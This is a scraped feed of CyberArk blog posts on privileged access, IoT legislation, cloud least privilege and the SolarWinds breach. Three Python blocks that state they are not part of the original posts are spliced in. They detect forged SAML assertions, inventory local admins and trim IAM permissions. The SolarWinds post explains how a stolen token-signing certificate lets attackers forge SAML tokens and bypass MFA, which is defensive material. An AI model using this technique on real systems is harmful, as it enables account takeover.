Implement or strengthen privileged access controls. After you’ve defined your user policies, you need to understand where every privileged account exists in your environments, before you can effectively protect them. This free tool can help. From there, start to implement or strengthen privileged access management controls like enforcing least privilege, regularly rotating privileged credentials, restricting access to Tier0 systems, and monitoring privileged sessions. Based on our team’s experience working with organizations around the world, we’ve put together this list of recommended steps to help roll out quick, effective controls to regain command of privileged access.

Lock down critical endpoints. As part of a defense-in-depth approach, limit privilege escalation and credential theft by removing local admin rights on servers, VMs, and other critical infrastructure, and implement Identity Security policies that help prevent attackers from moving vertically and laterally to gain administrative access in your environments. This will force attackers to use methods that will expose their presence, so you can detect attacks earlier, respond quickly and prevent attackers from reaching their end goal.

Enable secondary authentication methods. It’s one step that can block a majority of account compromise attacks. Further strengthen your access controls with risk-aware, adaptive multi-factor authentication that leverages user-specific contextual attributes such as location, device and network information to assign risk to each user login attempt and create dynamic access policies. Introducing strong MFA recommendations is also a good best practice to mitigate risk and close up security gaps (i.e. eliminate credential use without MFA).

Review third-party risk management processes. To mitigate the risk of supply chain infiltration, now is the time to revisit your vendor assessment, onboarding, and ongoing risk management processes and policies. In particular, do you have a strong grasp on each vendor’s own security controls, how they remotely access your environment, and what privileges are granted – and to whom – to access your sensitive enterprise assets and information?

Schedule a security health check. Security isn’t a check-box task – it’s a continuous process, just as regular medical check-ups and dental cleanings are important to maintaining overall hygiene and health. It’s critical to reevaluate existing security controls at a regular cadence to understand where you might have vulnerabilities and take steps to address them to mitigate risk. Now’s the time to schedule a “health check” with your security solution providers to help get, and stay, on the right track.

And as you look for ways to improve your organization’s ability to control and monitor privileged activity, visit our Security Fundamentals Guide. You’ll find best practices and specific controls required to appropriately protect your PAM solution deployment, and ultimately, your privileged accounts.

If you’re already a CyberArk customer, our team of experts are available to guide a detailed review of your existing privileged access management infrastructure and provide documented recommendations on areas of improvement and tailored guidance to optimize your environment. To learn more about this important, regular “PAM health check,” read the CyberArk Success Plans Outcome Catalog.

Get back to the basics to regain some control and get on the right path toward improving overall cybersecurity health.


]]>
A Step in the Right Direction: The IoT Cybersecurity Improvement Act https://www.cyberark.com/blog/a-step-in-the-right-direction-the-iot-cybersecurity-improvement-act/ Fri, 05 Feb 2021 14:16:32 +0000 https://www.cyberark.com/?p=112480 Internet of Things

A constantly growing network of connected devices – also known as the Internet of Things (IoT) – is expanding the landscape and reach of information technology and enabling digital business transformation. Experts project that by 2030, there will be 24.1 billion active IoT devices, up from 7.6 billion in 2019. But today, a lack of industry-wide cybersecurity standards, a surge in rogue connected devices, and widespread risky remote work habits have created a perfect storm for cyber attacks.

More than half of the IoT devices connecting to corporate networks today are consumer-facing. Companies that manufacture and deploy these devices do their best to secure them, but there is often a lack of adequate levels of protection. As a result, attackers can infiltrate these devices and put sensitive data and systems, and in some cases human safety, at risk. To put this in perspective, a recent Nokia study reveals that IoT device infections skyrocketed by 100% from 2019 to 2020.

While there’s much work to be done to tackle the rampant “IoT insecurity” challenge, U.S. public and private sectors collectively witnessed a step in the right direction with the newly passed Internet of Things Cybersecurity Improvement Act of 2020. Here’s what you should know about the law and how it can help shape and strengthen your organization’s own IoT security approach – regardless of industry.

What is the IoT Cybersecurity Improvement Act of 2020?

The IoT Cybersecurity Improvement Act of 2020 became public law in December 2020. This bit of legislation aims to establish minimum security requirements for IoT devices owned or controlled by the federal government. While it does not include “conventional IT devices such as smartphones and laptops,” the bill’s intentionally broad definition encompasses everything from smart thermostats to hospital beds, critical infrastructure, national arsenals, and more.

The Act acknowledges that IoT devices present a unique set of problems to organizations if not appropriately secured. And while it specifically addresses supply chain security risks to the federal government, as the first bill of its kind to be passed into law, the Act is expected to have far-reaching implications across enterprise and consumer markets.

Here is a high-level look at what’s covered:

  • The National Institute of Standards and Technology (NIST) must now publish standards and guidelines, including minimum information security requirements for managing vulnerable IoT devices that present risk. The Office of Management and Budget (OMB) must then review federal security policies and change them, as necessary, to align with NIST recommendations.
  • The NIST security standards must address four main categories: secure development, identity management, patching, and configuration management.
  • When security vulnerabilities are identified within IoT devices owned or controlled by federal agencies, the responsible contractor or vendor must report and resolve the security vulnerability to increase transparency and help accelerate risk mitigation efforts.

How to Step Up Your Organization’s IoT Security

IoT devices are known to have many firmware and software vulnerabilities, and many can be reached simply through weak credentials. It’s estimated that at least 15% of IoT devices use default credentials that are hardcoded into the device (and have never been changed). This creates a significant opportunity for attackers who target these devices to gain a foothold within networks. They can use these credentials to move laterally, escalate privileges and eventually gain access to an organization’s most critical and sensitive assets.

Today, any connected device can represent privilege risk based on the systems and data it is connected to, and who can access the device. That’s why it’s so important to identify each device and understand how it communicates with other devices, systems, and applications, and which people have access to it. But with so many devices online and so many employees working from home, it’s hard enough for IT and security teams to take inventory of all the IoT devices on their network, let alone ensure they meet enterprise security and compliance requirements.

Automated tools can help make this feasible by continually finding new devices and assessing the network, helping to ensure patches are pushed and weak or default credentials are eliminated. When coupled with a centralized tool that controls privileged access to systems for human and machine users based on a Zero Trust framework, organizations can enforce consistent security and compliance policies and better manage IoT devices across their lifecycles.

CyberArk’s integration with Forescout and Phosphorus empowers organizations to reduce IoT risk by driving greater visibility and shrinking the attackable surface. The three solutions work harmoniously to provide IoT security rigor with continuous detection, management and monitoring of IoT devices and their credentials. This pre-built integrated solution makes life easier for IT and security practitioners focused on strengthening IoT security within their organizations while helping federal agencies and partners to meet the mandates of the IoT Cybersecurity Improvement Act of 2020 across critical identity management, patching and configuration management domains.

]]>
5 Ways to Secure Your Windows Servers and Detect Advanced Threats Faster https://www.cyberark.com/blog/5-ways-to-secure-your-windows-servers-and-detect-advanced-threats-faster/ Tue, 02 Feb 2021 15:15:07 +0000 https://www.cyberark.com/?p=110485 PAM for Servers and VMs

As details of the recent SolarWinds supply chain attack continue to surface, we’re beginning to understand just how far these motivated attackers went to avoid attention and detection. What’s clear is that privileged access was key to gaining, and maintaining, persistence in their victims’ networks.

Advanced Persistent Threats Require Privileges to Remain Under the Radar

To initiate the attack chain, the SolarWinds attackers reportedly planted backdoor code, then delivered it to SolarWinds Orion users via a Trojanized software version update. By building in an intentional “dormant period” of up to 14 days, the attackers were able to cover their tracks, making it difficult for victim organizations to correlate their actions with other malicious activity. From there, the malicious code began searching for tools and processes within the environment that could either raise red flags (such as advanced threat monitoring capabilities) or open doors (such as security solutions that could be tampered with or disabled).

Next, the attackers used a variety of credential-harvesting methods to steal identities and credentials from authorized users, then searched for privileged account credentials to unlock access to systems, infrastructure and software. They escalated these privileges to reach higher value targets such as Windows servers until they reached their end goal. In many attack sequences, this “ultimate target” is the Domain Controller – the central authority of trust within Windows environments.

But perhaps the SolarWinds attackers’ stealthiest move was the “Golden SAML” – an Active Directory Federation Services (ADFS) bypass technique first identified by CyberArk Labs in 2017 but never seen in the wild until this attack. After gaining privileged access to a victim’s network, the attackers stole a SAML token signing certificate, allowing them to forge a valid SAML token and bypass MFA completely to gain unauthorized access to both the victim’s on-premises and cloud assets. The attackers likely understood that SAML token signing certificates are almost never changed, meaning they could persist in the network, undetected, for long periods of time.
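A defender’s view of the Golden SAML problem described above, as an added example that is not part of the original post or of any CyberArk tooling. Because a forged token is signed with the genuine (stolen) key, signature validation passes; what a defender can still check is whether the identity provider actually recorded issuing that assertion, whether the subject matches, whether the lifetime is longer than the IdP is configured to grant, and whether the signing certificate is overdue for rotation. The IdP issuance log, service-provider assertion records, thumbprint and policy values below are all constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed IdP (ADFS-style) issuance log: assertion IDs the IdP really issued, with subject.
# Real deployments would populate this from the federation server's audit events.
IDP_ISSUED = {
    "_a1": {"user": "alice@corp.example", "issued_at": "2021-01-20T09:00:00"},
    "_a2": {"user": "bob@corp.example", "issued_at": "2021-01-20T09:05:00"},
}

# Placeholder thumbprint of the token-signing certificate the IdP is known to use.
TRUSTED_SIGNING_CERTS = {"THUMBPRINT-PLACEHOLDER-CURRENT"}

# Assumed IdP policy: tokens live at most one hour; signing cert rotated at least yearly.
MAX_TOKEN_LIFETIME = timedelta(hours=1)
SIGNING_CERT_MAX_AGE = timedelta(days=365)

# Constructed assertions as seen by a service provider (for example a cloud app).
SP_ASSERTIONS = [
    {"id": "_a1", "user": "alice@corp.example", "cert": "THUMBPRINT-PLACEHOLDER-CURRENT",
     "issued_at": "2021-01-20T09:00:00", "expires_at": "2021-01-20T10:00:00"},
    # Forged-style record: cryptographically valid (signed with the real key), but the IdP
    # never issued it and it carries a 24-hour lifetime the IdP would never grant.
    {"id": "_zz9", "user": "admin@corp.example", "cert": "THUMBPRINT-PLACEHOLDER-CURRENT",
     "issued_at": "2021-01-20T09:10:00", "expires_at": "2021-01-21T09:10:00"},
]


def review_assertions(assertions, idp_issued, trusted_certs, max_lifetime):
    """Correlate SP-side assertions with the IdP issuance log and token policy.

    Returns (assertion_id, category) pairs. Categories:
      untrusted_signing_cert, no_idp_issuance_record, subject_mismatch, excessive_lifetime.
    """
    findings = []
    for a in assertions:
        issued = datetime.fromisoformat(a["issued_at"])
        expires = datetime.fromisoformat(a["expires_at"])
        if a["cert"] not in trusted_certs:
            findings.append((a["id"], "untrusted_signing_cert"))
        record = idp_issued.get(a["id"])
        if record is None:
            # Signature verifies, but the IdP has no memory of minting it: the core Golden SAML signal.
            findings.append((a["id"], "no_idp_issuance_record"))
        elif record["user"] != a["user"]:
            findings.append((a["id"], "subject_mismatch"))
        if expires - issued > max_lifetime:
            findings.append((a["id"], "excessive_lifetime"))
    return findings


def signing_cert_overdue(cert_created, now, max_age=SIGNING_CERT_MAX_AGE):
    """True when the token-signing certificate has outlived the rotation policy."""
    return now - cert_created > max_age


def run_demo():
    return review_assertions(SP_ASSERTIONS, IDP_ISSUED, TRUSTED_SIGNING_CERTS, MAX_TOKEN_LIFETIME)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
    # Constructed dates: a signing cert minted in 2017 and still in use in 2021 is long overdue.
    print("signing cert overdue:",
          signing_cert_overdue(datetime(2017, 6, 1), datetime(2021, 1, 20)))
```

Rotating the signing certificate invalidates any tokens forged with the stolen key, which is why the cert-age check sits beside the issuance correlation.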

Secure Your Windows Environments with Privileged Access Management

Even the strongest, most sophisticated defenses are not always enough to stave off highly targeted attacks, so it’s necessary to “assume breach” and take steps to protect high-value assets, detect threats earlier and reduce risk. Doing this effectively requires multiple layers of security, such as endpoint protection, detection and response technology, and strong privileged access management, and often happens in phases.

Given the quantity of Windows desktops, laptops, servers and virtual machines (VMs) deployed today, securing your Windows environment may be a natural place to start. Here’s how:

1. Take inventory of your local admin accounts. In theory, privileges are limited to user roles within the business. For example, a database admin (DBA) is granted privileges to log onto a Windows server to control and manage the SQL database – and that’s it. Or, a designated Windows server is permitted to only run a specific web-server application – and nothing else. But in reality, it’s common for Windows admins to grant local admin privileges to human and machine users in the name of convenience. This can spiral out of control quickly, making it difficult to trace who or what has access to which systems, when, and for what reason. As new machines are rapidly deployed in virtual environments, manually tracking every local admin account becomes virtually impossible. Take advantage of tools that help you automate this inventory process and make it manageable.

2. Stop sharing local admin accounts. These powerful accounts are used by IT staff to perform maintenance on workstations, servers, databases and more. Often, the same privileged account credentials are shared by multiple admins across an entire platform or organization – making them an easy target. With local admin rights, malicious insiders or external attackers can access additional privileged credentials, traverse the network and take over Windows workstations, servers, macOS machines, and other critical infrastructure. Strong privileged access controls like randomizing, regularly rotating, and carefully managing these “all-access passes” are a must.

3. Better yet – get rid of your local admin accounts altogether. Removing local admin rights from Windows servers and machines can dramatically reduce the risk of credential theft and ransomware infection – but it has to be done without hindering user productivity or complicating operations. A balanced approach enforces consistent least privilege policies and automates temporary privileged access elevation when end-users need it to perform required tasks. Also consider implementing just-in-time access so admins can log onto systems when needed, and for specific periods of time.

4. Identify all types of admin accounts and limit usage. Restricting access shouldn’t end with your local admin accounts. Other privileged admin accounts such as service accounts, application accounts, and privileged data user accounts must be identified, secured, and managed to maximize risk reduction.

5. Keep your software current. Regularly applying software patches on servers and machines is integral to a defense-in-depth strategy, as are routine updates to server control panels, content management systems, and plug-ins. Also remove or turn off unnecessary services – the fewer things you have running on a system, the better.
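
One way to automate the step-1 inventory and the step-2 shared-account check, as an added example (not CyberArk's code): rebuild current local Administrators membership per host from Windows Security events 4732 (member added to a security-enabled local group) and 4733 (member removed), then flag accounts that hold local admin on several hosts and host/member pairs outside an allowlist. It assumes the collector exposes the events as dicts using the EventData field names Windows uses (MemberName, TargetUserName for the group, Computer, TimeCreated) and has already resolved MemberSid to MemberName; the events and allowlist below are constructed.

```python
"""Rebuild a local-admin inventory from Windows Security audit events.
Added example; event records and the allowlist are constructed."""
from collections import defaultdict

ADMIN_GROUP = "Administrators"

# Constructed sample events. Field names follow the 4732/4733 EventData
# schema; MemberSid is assumed to be resolved to MemberName upstream.
EVENTS = [
    {"EventID": 4732, "Computer": "WS01", "TimeCreated": "2021-01-04T09:00:00",
     "MemberName": "CORP\\svc-backup", "TargetUserName": "Administrators"},
    {"EventID": 4732, "Computer": "WS02", "TimeCreated": "2021-01-04T09:05:00",
     "MemberName": "CORP\\svc-backup", "TargetUserName": "Administrators"},
    {"EventID": 4732, "Computer": "WS02", "TimeCreated": "2021-01-05T10:00:00",
     "MemberName": "CORP\\jdoe", "TargetUserName": "Administrators"},
    {"EventID": 4732, "Computer": "SQL01", "TimeCreated": "2021-01-05T10:30:00",
     "MemberName": "CORP\\dba-team", "TargetUserName": "Administrators"},
    {"EventID": 4733, "Computer": "WS02", "TimeCreated": "2021-01-06T08:00:00",
     "MemberName": "CORP\\jdoe", "TargetUserName": "Administrators"},
    # A different local group: must not count toward the admin inventory.
    {"EventID": 4732, "Computer": "WS01", "TimeCreated": "2021-01-06T09:00:00",
     "MemberName": "CORP\\jdoe", "TargetUserName": "Remote Desktop Users"},
]

# Constructed allowlist: who is permitted to hold local admin on which host.
ALLOWLIST = {"SQL01": {"CORP\\dba-team"}}


def build_inventory(events):
    """Return {host: {member: time_added}} for current Administrators members.

    Events are replayed in TimeCreated order so a later 4733 cancels an
    earlier 4732 for the same host/member pair.
    """
    inventory = defaultdict(dict)
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev.get("TargetUserName") != ADMIN_GROUP:
            continue
        host, member = ev["Computer"], ev["MemberName"]
        if ev["EventID"] == 4732:
            inventory[host][member] = ev["TimeCreated"]
        elif ev["EventID"] == 4733:
            inventory[host].pop(member, None)
    return {host: members for host, members in inventory.items() if members}


def find_shared_admins(inventory, min_hosts=2):
    """Accounts holding local admin on several hosts: the 'all-access pass'
    the text warns about, and the first candidates for removal or vaulting."""
    hosts_by_member = defaultdict(set)
    for host, members in inventory.items():
        for member in members:
            hosts_by_member[member].add(host)
    return {m: sorted(h) for m, h in hosts_by_member.items() if len(h) >= min_hosts}


def find_unapproved(inventory, allowlist):
    """Host/member pairs that the allowlist does not cover."""
    return sorted((host, member)
                  for host, members in inventory.items()
                  for member in members
                  if member not in allowlist.get(host, set()))


if __name__ == "__main__":
    inv = build_inventory(EVENTS)
    for host, members in sorted(inv.items()):
        print(host, sorted(members))
    print("shared across hosts:", find_shared_admins(inv))
    print("not on allowlist:", find_unapproved(inv, ALLOWLIST))
```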

Mitigate the Risk of Targeted Attacks with New CyberArk Features

CyberArk offers a comprehensive set of security capabilities to protect privileged access to Windows servers and machines both on-premises and in the cloud. To help organizations address existing weaknesses in their environment and protect against future attacks, we’ve introduced two new CyberArk Endpoint Privilege Manager features, which are now available as part of our 30-day free trial:

Credential theft detection and blocking for SolarWinds Orion users. Automatically detect and block attempts to harvest and steal credentials cached by the SolarWinds Orion application that can be used to access cloud services like AWS and Azure or enable remote access to corporate systems. This can help SolarWinds Orion customers to prevent attackers from gaining a foothold for lateral movement.

Duo Integration “Secrets Dump.” Multi-factor authentication (MFA) tools – like all software – need credentials in order to protect the application from unauthorized access. As such, all MFA requires credential protection. Our first policy addresses Duo MFA, which is widely used by administrators and users alike and integrates with popular applications such as Windows device logins and Outlook on the web (OWA). As the Golden SAML technique takes hold, other threat actors may try to steal a credential, aka secret key, stored within the Duo application and abuse it to bypass MFA. With this new rule, organizations can automatically protect against such Duo secret key theft and MFA tampering.

Don’t wait until the aftermath of a targeted attack to shut down the privileged pathway in your Windows environments. Follow these best practices to reduce your risk and regain control – and remember, we’re here to help.

Banking Cybersecurity Vet: Why Transformation Must Start at the Top https://www.cyberark.com/blog/banking-cybersecurity-vet-why-transformation-must-start-at-the-top/ Fri, 22 Jan 2021 14:16:50 +0000 https://www.cyberark.com/?p=108180

The banking industry spends 40% more on combating cybercrime than any other industry, with a per-firm average of $18.5 million spent on direct costs of incidents annually. When you also consider that cyber attacks on banks went up a whopping 238% during the first few months of the COVID-19 pandemic, you get a very clear sense that this is a top priority problem, and it needs top-down support.

While you’re likely to get agreement on the former, you may be surprised to find less on the latter. Everyone agrees that cybercrime needs to be guarded against, yet they’re not always on the same page as to whose job that actually is. Part of the problem stems from the idea that it’s, well, just one job. Making it the CISO’s responsibility to go department by department to get “buy-in” on cybersecurity may be an outward show of taking the issue seriously, but in practice, it could actually create unintended weaknesses.

Those attempting to implement new ways of approaching cybersecurity are faced with competing cultural perspectives on technology and competing ideas about how to implement that technology. Left to shoulder the burden of responsibility alone, they can find themselves unable to get smoothly from point A to point B and beyond.

Gerry Owens knows exactly what it takes to change outmoded thinking and implement lasting change. A veteran IT risk management and cybersecurity executive with more than 30 years of experience in the banking industry, Owens has often been the lynchpin at the intersection of organizational transformation, employee engagement, and technology. Currently CEO and Founder of GOTAB IT RISK inc., he works with security and risk leaders to architect and execute successful tech transformations.

We sat down with Gerry to learn why some large-scale initiatives “stick,” while others can’t seem to get off the ground, and how – as a firm believer that privileged access management (PAM) underpins any major cybersecurity strategy – his frontline insights can help organizations navigate their own PAM journeys.

But what logically could have been a technology-focused discussion turned out to be anything but. In fact, we barely talked about that at all.

“I’ve seen many technology implementations struggle,” Owens explains, in a conversation rooted in his career in IT management and his unique experience in the banking industry. “Often it is because people didn’t embrace the change as much as you needed them to, whether it is not understanding the significance of the program, alignment to the corporate strategy, or not having a clear direction on priorities. This tends to create an element of dissension – people who didn’t feel that the change was worthwhile, or that it impacted them adversely. And whether they knowingly or unknowingly fostered this negativity, they’re the ones that stood in the path of a successful implementation.”

The short answer, says Owens, is that for implementation to take hold, it has to be something driven by senior executives across the firm with clear communications across all levels, and shared accountability for the outcome. “Organizational change management needs to lead with people,” says Owens.

Gerry Owens on Organizational Transformation

C-Suite Support is an A-Level Priority

Owens bristles at the term “getting buy-in” when discussing the implementation of new technology programs because, quite simply, he doesn’t see programs like privileged access management as anything less than a core priority. He’d also like to do away with the term “technology programs” altogether while he’s at it.

“We need to stop calling them [that] because, as a matter of fact, they’re business transformation programs that tend to disrupt operational processes,” Owens says.

If such programs are not prioritized – and instead seen as somehow optional – they will continue to face challenges to their acceptance and complete adoption all the way down the corporate hierarchy. During his years in the naturally risk-averse banking industry, Owens saw firsthand how important it was for CISOs to have the ear of CEOs and board members. Their understanding of, and appreciation for, the types of risks the firm is exposed to, and the security programs necessary to protect the organization sent a clear message from the top: This is the new way of doing things.

“We have to make it clear: privileged credentials and accounts represent one of the largest attack surfaces for organizations today,” Owens says. “We’re not giving you the rite of passage. We’re telling you, ‘This is going to be your new operating model.’”

Through his consulting work, he’s heard this particular struggle voiced time and again – particularly from organizations in the mid-market. Rather than a strictly mandated course of action directed from above, the onus is on the CISO to make the case to each level of the company directly – some of whom will immediately recognize the importance and some of whom will fail to see the relevance to their particular silo – in a wasteful effort to get everyone onboard rather than an effective push to communicate “this is how things are going to be done now.”

Owens sees only one true way for operational transformation to not only get implemented thoroughly but take hold, grow and thrive – and that’s through transparency from the top down. And this isn’t just “buy-in,” it’s true understanding, he says. “When I’m implementing something so complex that’s touching a whole bunch of business processes, applications, and infrastructure technology, not only does the accountability of who has access become important, but I also need to make sure I’ve got the people at the table that will successfully see the project through its evolution.”

To ensure that security is seen as a shared responsibility throughout an organization rather than one person or group’s “job,” Owens suggests a few key strategies:

  • Make It Urgent, Not Optional. “[Senior executives] need to understand the vulnerable state the organization is in right now – and the consequences that could come as a result of this vulnerability,” he says. The mass – and sudden – shift to remote work in the past year has stretched and tested resources, which is only accelerating the urgency of strong security protocols. The recent SolarWinds breach has torn through government and private organizations alike in what is the latest example of how privileged credentials and accounts remain incredibly vulnerable to attack. There is a need to drive a crisis mindset before the crisis occurs.
  • Build Your Case. Create a business-level narrative to show top stakeholders that unprotected privileged access is a security challenge that encompasses every single user, application, and machine identity – and has the power to completely disrupt business. Aligning security with clear business goals, and risk appetite – outlining metrics that define success while also taking into account potential disruptions – will help ensure security isn’t seen as an add-on or some useful tool, but an integral part of growing and maintaining the business.
  • Don’t Go it Alone. To gain momentum for acceptance and implementation, CISOs need to “interface with the right levels of influence within the organization.” For example, Owens encourages them to “talk to your risk group and make sure they understand the importance of the PAM initiative, so they can help escalate to leadership in parallel and drive urgency amongst business decision-makers.” Also bring the people with influence at every level, such as HR, into the fold. They can help drive the message that “security is everyone’s responsibility.”
  • Break Out the Placemat. Your case – and subsequent executive reports – should be able to be made in a single page to ensure it gets read and absorbed. “I call it the placemat,” Owens says. “If we can’t tell some of the most senior executives within the organization how we’re doing and what the situation is, or where they need to help, on one page, we don’t deserve to be in this role.”

Security can only become part of an organization’s DNA when there is, in Owens’ words, “a sense of accountability across the organization that everyone is responsible for security and for the firm’s performance when it comes to privileged access.” When this is communicated clearly and directly from the top, the entire process tends to go much more smoothly. That’s when organizations realize cybersecurity isn’t a job, it’s an integral part of everything they do – and it’ll only get more important year after year.

People, Process and Technology: Six Best Practices for Cloud Least Privilege https://www.cyberark.com/blog/people-process-and-technology-six-best-practices-for-cloud-least-privilege/ Fri, 15 Jan 2021 14:21:21 +0000 https://www.cyberark.com/?p=107940 6 Cloud Least Privilege Best Practices

If your company is like most, it rolled out flexible remote work options and dialed up digital transformation last year – all thanks to the cloud. And now, you probably rely on more cloud services and SaaS applications than you ever have before.

Yet as organizations’ cloud usage grows – and increasingly spans multiple cloud providers – the creation of human, application, and machine identities has accelerated. Mapping relationships between all of these identities and cloud resources has gotten extremely complicated.

A recent ESG survey found that maintaining consistent identity and access management (IAM) controls across public and private clouds is the No. 1 challenge for IT and cybersecurity professionals charged with IAM tasks. Still, achieving a unified approach to IAM is their No. 1 priority, which makes sense, given the onus is on the cloud customer to manage and secure access in their cloud environments, as outlined in the leading cloud providers’ shared responsibility model.

Implementing the principle of least privilege – an essential cybersecurity best practice – is one of five key steps for securing privileged access and identities for cloud-based infrastructure and applications.

In a perfect world, each identity would be configured to have only the privileges and permissions needed to perform its intended functions – nothing more, nothing less. This is the crux of the principle of least privilege, and a core tenet of Zero Trust. But even the most sophisticated security team will tell you this is easier said than done.

Cloud Permission Misconfiguration: A Critical Attack Vector

Especially at scale, the dynamic nature of cloud roles, infrastructure, applications, and services often leads to misconfigurations that can result in the accumulation of unused permissions. Attackers can exploit these permissions to gain access to critical cloud infrastructure, steal or alter sensitive data or interrupt cloud-hosted services.

Over-permissioned accounts and roles are the top cloud misconfiguration today, according to the same ESG study, and they’ve been traced to some of the largest breaches in history. The 2020 IBM Cost of a Data Breach Study found that 19% of all breaches were caused by misconfigurations of cloud servers and virtual machines (VMs) – and they’re costlier than other breach types at $4.41M on average.

Six Steps to Implementing Cloud Least Privilege

It’s clear that least privilege must become a cloud IAM priority. Here are six best practices for reducing risk and driving change across people, processes, and technology to get there:

1. Get everyone on the same page. Research from CyberArk and the Cloud Security Alliance shows responsibility for cloud IAM design and operations varies notably between organizations. Stakeholders should align to identify which teams and individuals will “own” the implementation of least privilege strategies – and ensure these responsibilities are clearly understood.

2. Don’t make security decisions in a vacuum. Consult cloud architects and developer teams on all process and technology decisions at the start of the program and throughout the implementation. This helps to maximize buy-in from key stakeholders and increase long-term effectiveness.

3. Map all existing IAM permissions. Organizations can’t defend against threats they aren’t aware of. First, identify and visualize all IAM permissions across cloud provider environments and Kubernetes services. Then, map access relationships between identities and resources to uncover potential vulnerabilities.

4. Remediate unused and risky entitlements. Excessive permissions for human, machine, and application identities should be removed immediately. AI-powered recommendations can speed and simplify this process, and the most effective solutions can also uncover hidden, platform-specific risks like Shadow Admins. If you’re taking a phased approach, start by eliminating excessive privileges to your most valuable cloud assets – then apply least privilege policies more broadly over time.

5. Make bare minimum permissions the default for new workloads: AWS is especially clear on this point, advising organizations to “Start with a minimum set of permissions and grant additional permissions as necessary. Doing so is more secure than starting with permissions that are too lenient and then trying to tighten them later.”

6. Consistently measure and verify least privilege. Least privilege doesn’t last forever. Structuring consistent, periodic reviews to clean up unused permissions that accumulate over time is essential to combatting permission creep. Quantify risk reduction over time with analytics-based assessments for each unique environment.
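
Steps 3 through 6 in code, as an added example (not CyberArk's or AWS's code): audit an IAM policy for wildcard actions and resources and for services the principal has not used within a window, produce a tightened policy that keeps only the services actually used, and count how many actions were removed so the reduction can be measured. The last-accessed data mimics what AWS IAM Access Advisor reports but is a constructed dict here, and the policy is a constructed document, so the block runs offline.

```python
"""Find and trim unused IAM entitlements in a policy document.
Added example; the policy and the last-accessed data are constructed.
Only Allow statements are analysed; Deny statements and any Condition
blocks are passed through untouched."""
import copy
import json
from datetime import datetime, timedelta, timezone

# Constructed policy attached to a hypothetical reporting role.
POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "ReadReports", "Effect": "Allow",
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-reports", "arn:aws:s3:::example-reports/*"]},
        {"Sid": "Metrics", "Effect": "Allow",
         "Action": "cloudwatch:PutMetricData", "Resource": "*"},
        {"Sid": "LegacyAdmin", "Effect": "Allow",
         "Action": ["ec2:*", "iam:PassRole", "dynamodb:Scan"], "Resource": "*"},
    ],
}

NOW = datetime(2021, 1, 15, tzinfo=timezone.utc)
# Constructed Access-Advisor-style data keyed by service prefix (None = never used).
LAST_ACCESSED = {
    "s3": NOW - timedelta(days=3),
    "cloudwatch": NOW - timedelta(days=1),
    "ec2": None,
    "iam": None,
    "dynamodb": NOW - timedelta(days=200),
}
UNUSED_AFTER_DAYS = 90  # review window; tune per environment


def _as_list(value):
    return value if isinstance(value, list) else [value]


def service_of(action):
    """'s3:GetObject' -> 's3'; a bare '*' has no service prefix."""
    return action.split(":", 1)[0] if ":" in action else "*"


def _used_recently(service, last_accessed, cutoff):
    seen = last_accessed.get(service)
    return seen is not None and seen >= cutoff


def audit_policy(policy, last_accessed, now=NOW, unused_after=UNUSED_AFTER_DAYS):
    """Return findings as (Sid, kind, detail) tuples; kinds are
    wildcard-action, unused-service and wildcard-resource."""
    findings = []
    cutoff = now - timedelta(days=unused_after)
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow":
            continue
        sid = st.get("Sid", "<no Sid>")
        for action in _as_list(st["Action"]):
            svc = service_of(action)
            if action == "*" or action.endswith(":*"):
                findings.append((sid, "wildcard-action", action))
            if svc != "*" and not _used_recently(svc, last_accessed, cutoff):
                findings.append((sid, "unused-service", svc))
        if "*" in _as_list(st["Resource"]):
            findings.append((sid, "wildcard-resource", "*"))
    return findings


def tighten_policy(policy, last_accessed, now=NOW, unused_after=UNUSED_AFTER_DAYS):
    """Copy the policy, dropping actions for services unused within the window
    (a bare '*' action always goes) and any Allow statement left empty.
    Wildcard resources are left for a human to scope: the right ARNs cannot
    be derived from the policy alone."""
    cutoff = now - timedelta(days=unused_after)
    tightened = copy.deepcopy(policy)
    kept = []
    for st in tightened["Statement"]:
        if st.get("Effect") != "Allow":
            kept.append(st)
            continue
        actions = [a for a in _as_list(st["Action"])
                   if service_of(a) != "*"
                   and _used_recently(service_of(a), last_accessed, cutoff)]
        if actions:
            st["Action"] = actions
            kept.append(st)
    tightened["Statement"] = kept
    return tightened


def count_actions(policy):
    """Crude risk metric: number of action entries granted by the policy."""
    return sum(len(_as_list(st["Action"])) for st in policy["Statement"])


if __name__ == "__main__":
    for finding in audit_policy(POLICY, LAST_ACCESSED):
        print("%-12s %-18s %s" % finding)
    trimmed = tighten_policy(POLICY, LAST_ACCESSED)
    print("actions before/after:", count_actions(POLICY), count_actions(trimmed))
    print(json.dumps(trimmed, indent=2))
```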

Consistent Controls are Key for Scalable Security

Today, you’re likely utilizing capabilities from multiple cloud providers for cost savings, increased availability or unique technical features. And configuring the countless combinations of user to application access – for any time and from any place or device – is a real challenge. Add in the complexity of DevOps tools, increased automation and multiple on-premises data centers, and things get even more… cloudy. Cracking the code requires a unified approach.

The most effective strategies employ centralized, consistent IAM and privileged access management (PAM) controls that enable least privilege for all identities linked to resources – from cloud management consoles to SaaS applications – across hybrid and multi-cloud environments. It’s also important to layer these controls with single sign-on and context-based multi-factor authentication (both also protected by PAM) to further secure access to cloud environments.

Whether you’re focused on securing an initial project in a hybrid environment or fully embracing cloud native applications today, a consistent approach is the key to mastering privileged and identity access management in the cloud.

If you’re interested in further exploring strategies to implement and measure cloud least privilege, check out our free trial of CyberArk Cloud Entitlements Manager, an AI-powered SaaS solution that removes excessive permissions across your cloud estate.

Editor’s Note: This is the final post in a series on securing privileged access and identities in the cloud. Explore these previous posts:

Breach of Trust: How Cyber-Espionage Thrives On Human Nature https://www.cyberark.com/blog/breach-of-trust-how-cyber-espionage-thrives-on-human-nature/ Tue, 12 Jan 2021 13:39:22 +0000 https://www.cyberark.com/?p=107559 Cyber-espionage Thrives on Human Nature

With so much of daily life tethered to digital communication and most of our important information residing in data clouds, we’ve all got a lot riding in this virtual atmosphere. So naturally, the seemingly endless stream of cyber attack reports put everyone on edge. And Hollywood film scripts contribute to our collective tension, creating a shadowy underworld rampant with “cyber-espionage” and high-tech, sophisticated criminals cracking codes and infiltrating impenetrable defenses.

But like a lot of things whose perceptions are shaped by movies and television, the reality is much more mundane. And that, in some ways, may be even scarier.

